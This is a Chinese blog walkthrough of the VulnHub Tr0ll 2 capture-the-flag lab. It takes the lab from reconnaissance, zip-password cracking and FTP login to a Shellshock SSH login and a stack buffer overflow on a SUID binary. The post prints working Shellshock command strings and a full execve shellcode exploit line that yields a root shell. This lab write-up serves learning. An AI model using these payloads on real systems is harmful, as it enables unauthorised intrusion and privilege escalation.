2、vulnhub-tr0ll-2

最新推荐文章于 2023-10-28 16:39:54 发布
最新推荐文章于 2023-10-28 16:39:54 发布
阅读量96 收藏
点赞数
分类专栏: vulnhub 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42660246/article/details/132993177
版权

1. 渗透过程

1.1 nmap 发现靶机

1.2 nmap扫描详细信息

1.3 爆破目录,获取到robots.txt

1.4 robots.txt中的路径添加到字典中,进一步爆破

发现4个页面,浏览器访问后,均为相同的图片。

将图片都下载下来,进行比较

1.5 计算图片MD5

发现下载下来的4个图片中,2.jpg 明显不同,使用16进行编辑器查看。

这里使用 strings 命令查看:

发现文件有信息: ​ y0ur_self 

1.6 获取密码字典

访问 http://192.168.8.121/y0ur_self/ 

进而访问: http://192.168.8.121/y0ur_self/answer.txt 

页面内容为base64编码,需要批量解码。

使用 wget http://192.168.8.121/y0ur_self/answer.txt 将文件下载下来,

并使用命令进行解码: cat answer.txt | base64 --decode > decode.txt 

1.7 弱密码登录ftp

使用Tr0ll/Tr0ll顺利登录ftp服务器:

在ftp服务器只发现了一个文件: lmao.zip ,通过get下载下来

1.8 通过密码字典解压缩 ​lmao.zip​ 

通过 unzip 解压时发现需要密码

使用1.7解码后的 decode.txt 作为密码字典进行解压,

使用fcrackzip工具: fcrackzip -v -D -u -p decode.txt lmao.zip 

 

Fcrackzip是一款专门破解zip类型压缩文件密码的工具,工具小巧方便、破解速度快,能使用字典和指定字符集破解,适用于linuxmac osx 系统。

-u zip去尝试

-D 使用字典

-p 使用字符串作为初始密码/文件

来自 VulnHub-TR0LL: 2-靶机渗透学习_嗯嗯呐的博客-CSDN博客

 

解压之后发现 noob 文件内容为 RSA 私钥:

1.9 使用私钥登录SSH

尝试使用noob用户和noob私钥文件登录靶机

直接ssh登录会自动断开,这里存在一个shellshock漏洞:

分析详见:

详解ShellShock 漏洞复现原理,内附ShellShock的修复方法_shellshock漏洞_悬镜安全的博客-CSDN博客

Bash还有一种使用环境变量来定义函数的方法,这是它的特性。

如果环境变量的值以字符"() {"开头,那么这个变量就会被当作是一个导入函数的定义(Export),这种定义只有在shell启动的时候才生效。

例如:

 

成功登录ssh三种方式,详见链接:https://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh

ssh noob@192.168.8.121 -i noob -t "() { :; }; /bin/bash"

ssh -i noob noob@192.168.8.121 -t "() { :; }; /bin/bash"

ssh -i noob 192.168.8.121 -l noob -t "() { :; }; /bin/bash"

查看特权: find / -user root -perm -4000 -print 2>/dev/null 

 

1.10 缓冲区溢出漏洞

缓冲区溢出漏洞和codeshell原理,见

浅析缓冲区溢出漏洞的利用与Shellcode编写_Tr0e的博客-CSDN博客

尝试执行r00t, ./r00t ,得到用法

测试是否存在缓冲区溢出: ./r00t $(python -c 'print "A" * 300')   ---生成300A 

得到提示: Segmentation fault 意为分段错误,确认存在溢出。

1.11 查找偏移量

pattern_create是生成一个字符串模板输入后根据EIP来确定覆盖return addr的长度。

1.11.1 利用 ​patern_creat.rb​ ,在kali本地生成300个字符,找偏移量:

 locate pattern_create.rb 

 /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 300 

1.11.2 GDB分析

gdbGNU开源组织发布的一个强大的Linux下的程序调试工具,逆向分析有非常多好用的工具,但是GDB毋庸置疑是最强之一,它的pwndbgpeda插件那就是辅助GDB上神器行列的最强帮手。

使用gbd进行拆解,找溢出值,填充生成的300字符,获取偏移地址:

gdb r00t

run  Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9

 

获取到地址 0x6a413969 ,利用kali中的 pattern_offset.rb ,找偏移量:

 /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 6a413969 

获取偏移量为268。

1.11.3 查找ESP的溢出地址

前面找到偏移量之后,可以知道栈空间大小占据空间位置,接下来要找到跳板地址也就是ESP,就可以跳到恶意代码shellcode的位置。

(1)print写入268个A和4个B,查找出EIP地址: r $(python -c 'print "A"*268 + "B"*4') 

使用 info r 查看:

(2)获取ESP值(下一跳值)

print写入268个A,4个B和20个C,查找出ESP地址: r $(python -c 'print "A"*268 + "B"*4 + "C"*20') 

获取到ESP地址: 0xbffffb50 ,即反向ESP为 \x50\xfb\xff\xbf 

1.11.4 shellcode编写

编写漏洞利用程序。(A * 268)(shell偏移量)(nop sled)(shellcode)

发现esp的位置是0xbffffb50,但测试中发现有时候不能使用此偏移量作为shell位置。必须稍微增加或减少偏移量,因为在调试二进制文件时内存有所不同。

 ./r00t $(python -c 'print "A"*268 + "\x30\xfb\xff\xbf" + "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"') 

 

成功获取到root权限的shell,拿到Proof.txt的文件内容。终于成功!

 

GreatBug333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub系列-Tr0ll-2
Yasso的博客
12-24 635
靶机:192.168.249.136 kali: 192.168.249.132 一、信息收集 nmap -sV -sS -A 192.168.249.136 –查看开放端口及服务 –ftp 21端口发现需要用户名和密码— 猜测用户名可能是Tr0ll 试了试密码也是这个 有个zip但要密码 dirb http://192.168.249.136/–对80端口http服务深入探测– –robots(.txt)可以正常访问– –应该是目录,作为字典扫一下— dirb http://192.168.2
Vulnhub靶机 Tr0ll2
菜浪马废的博客
06-09 566
80什么也没找到 ftp倒是登录成功了 下载文件 需要密码 去看看之前看到的图片 以为是密码 结果是网页 速度好快啊 直接密码就出来了 完了 缓冲区溢出 我不会啊我不会 我不想做缓冲区溢出的题 ...
VulnHub靶场系列-Tr0ll2
rlenew的博客
05-28 641
主机:192.168.136.133 靶机:192.168.136.158 先用nmap扫描网段发现目标主机以及其开放的端口和服务 登陆主页 按照惯例查看一下源代码 发现一个有用的信息Author:Tr0ll,试一下利用这个能不能登上ftp 下载这个压缩包但是提示需要密码解压 然后再深层次扫描一下看看有没有其他漏掉的信息 登上robots.txt看看有没有其他有用的 发现有超级多个文件,经过一次次查看,发现在don’t_bother有一张图片 在源代码查看发现存在隐藏文件,下载图片 用ca
vulnhub Tr0ll: 2
箭雨镜屋
12-30 2323
本文思路: nmap扫描---->dirb扫描发现robots---->dirb配合找到的字典爆破目录---->访问目录下载图片---->strings考察图片,发现新目录y0ur_self---->访问y0ur_self目录,获得字典answer.txt---->弱口令登录ftp---->用fcrackzip爆破lmao.zip密码---->通过密钥ssh登录,得到noob用户的shell---->linpeas.sh探测提权途径---->利用缓冲区溢出漏洞提权
9-vulnhub-Tr0ll2
尼德霍格007
07-27 327
VulnHub-Tr0ll2 靶机地址:https://www.vulnhub.com/entry/tr0ll-2,107/ 目标:得到root权限&找到proof.txt 作者:尼德霍格007 时间:2021-7-27 一、信息收集 打开kali虚拟机和目标机,两台虚拟机网络都处于NAT模式 kali查看本机IP段,我的是192.168.21.0/24 nmap扫一下本网段 nmap -sP 192.168.21.0/24 目标机IP地址是192.168.21.145 扫描开放端口 nmap
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
1756-EN2TR尺寸图
12-23
1756-EN2TR尺寸图
IPD技术评审(TR1-TR6)知识分享
03-15
IPD技术评审(TR1-TR6)知识分享IPD技术评审(TR1-TR6)知识分享IPD技术评审(TR1-TR6)知识分享IPD技术评审(TR1-TR6)知识分享IPD技术评审(TR1-TR6)知识分享
GS8551-TR 数据手册.pdf
03-03
产品分类 精密放大器 运算放大器及比较器 电路数(通道数) 1 输出类型 满摆幅 压摆率 0.95V/μs 增益带宽积(GBP) 1.8MHz -3db 带宽 ...SOT-23-5
PD CEN-TR 17792-2022
03-20
PD CEN-TR 17792-2022
小白的靶机VulnHub-Tr0ll2
wo41ge的博客
12-25 384
找到了此次CTF目标计算机IP地址:192.168.86.174 21、22、80端口 直接访问 查看 源代码 图片下载 进行 查看 发现作者是Tr0ll 可能 是一个 有效的用户名 直接尝试/robots目录 把这个文件robots.txt下载下来 剔除反斜杠,使用dirb进行批量尝试,挖掘可用的目录 发现4个可用的目录 以此访问上述4个目录,并查看其网页源码 发现有用的信息 四个目录都是如此 下载下来 strings分析看一下 根据上面提示获得存在隐藏目录y0ur_self 尝试.
vulnhub靶场--Tr0ll2靶场
zzzzzzkeai的博客
11-27 794
vulnhub靶场--Tr0ll2靶场
Tr0ll2 vulnhub靶场(缓冲区溢出)
weixin_62621015的博客
03-12 742
Tr0ll2 vulnhub靶场(缓冲区溢出漏洞)
Linux unzip命令
dency
05-27 377
Linux unzip命令用于解压缩zip文件 unzip为.zip压缩文件的解压缩程序。 语法 unzip [-cflptuvz][-agCjLMnoqsVX][-P <密码>][.zip文件][文件][-d <目录>][-x <文件>] 或 unzip [-Z] 参数: -c 将解压缩的结果显示到屏幕上,并对字符做适当的转换。 -f 更新现有的文件。 -l 显示压缩文件内所包含的文件。 -p 与-c参数类似...
vulnhub-Tr0ll: 2 (考点:脑洞/猜猜猜/linux缓冲区溢出)
冬萍子癸水
04-23 416
https://www.vulnhub.com/entry/tr0ll-2,107/ nat模式, arp-scan -l 比平常多出来的ip就是靶机 这靶机跟上一个同名作品1一样继续考脑洞,猜猜猜,后面的缓冲区溢出,更是3个door不停的变换加断掉ssh加禁止ls等,够无聊的。。。。 这个缓冲区溢出,也挺诡异,我搜了这台靶机中国人写的外国人写的很多文章。esp地址和shellcode有的人这个可...
OSCP练习:vulhub靶机TR0LL 2攻略
weixin_47311099的博客
04-22 4305
信息收集 主机发现 先用namp做个扫描 在这里插入图片描述 发现21ftp、22ssh、80http 网站信息收集 访问web页面,跟上一关一样没啥东西 爆一下网站目录 发现robots文件中告诉我们一些路径,将其保存当作dirb字典在进行爆破 果然又发现了几个路径,但是所有页面都是同一个图…以及一句话… 但是!当我们把图片下载下来,算一下MD5就会发现/dont_bother里的图片MD5跟其他的不一样! 看一眼图片二进制发现重要信息,y0ur_self会是突破电 strings cat_t
渗透测试靶机---Tr0ll
最新发布
久恙502的博客
10-28 287
渗透测试,打靶经历记录,大佬多多指点,谢谢!
VulnHub-TR0LL: 2-靶机渗透学习
嗯嗯呐的博客
12-02 891
**靶机地址:https://www.vulnhub.com/entry/tr0ll-2,107/ 靶机难度:中级(CTF) 靶机描述:Tr0ll系列VM中的下一台计算机,这比原始的Tr0ll难度有所提高,但是解决所需的时间大致相同,并且毫无疑问,巨魔仍然存在! 难度是从初学者到中级。 目标:得到root权限目录信息收集fcrackzip爆破SSH用户枚举漏洞shellshock攻击缓冲区溢出提权总结 信息收集 nmap确定靶机地址 nmap扫描靶机端口 扫描出三个端口 21 FTP 22 ssh 80
Pentest Lab - Tr0ll
Nixawk
09-12 3429
[Download]: http://vulnhub.com/entry/tr0ll-1,100/ <
GT25C256A-2GLA1-TR
08-22
GT25C256A-2GLA1-TR是一种电子存储器芯片。根据提供的引用信息,GT25C系列有GT25C32、GT25C32A、GT25C64、GT25C128和GT25C128A等型号。另外,还有GT25C01、GT25C02、GT25C04、GT25C08和GT25C16等型号。然而,GT25C...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值